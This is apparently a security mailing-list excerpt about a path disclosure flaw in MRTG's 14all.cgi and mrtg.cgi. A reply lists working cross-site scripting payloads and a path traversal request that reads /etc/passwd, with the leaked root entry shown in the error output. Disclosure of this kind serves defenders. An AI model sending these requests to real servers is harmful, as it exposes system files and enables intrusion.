Mrtg Path Disclosure Vulnerability (Revised)

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 /This is Mrtg Web Frontend 14all.cgi bug. You may find the revised security announcement below/ Mrtg/RRD 14all.cgi Path Disclosure Vulnerability Type: Input Validation Error Release Date: February 4, 2002 Product / Vendor: 14all.cgi is a CGI script to...

Re: Mrtg Path Disclosure Vulnerability

/mrtg.cgi?log=scriptalert'CSS'/script /mrtg.cgi?log=scriptalert'Cross Site Scripting'/script /mrtg.cgi?cfg=../../etc/passwd : ------------------- mrtg.cgi error ------------------------ Software error: ERROR: CFG Error Unknown Option "root:PASS:0:0:root:/root" on line 2 or above. Check...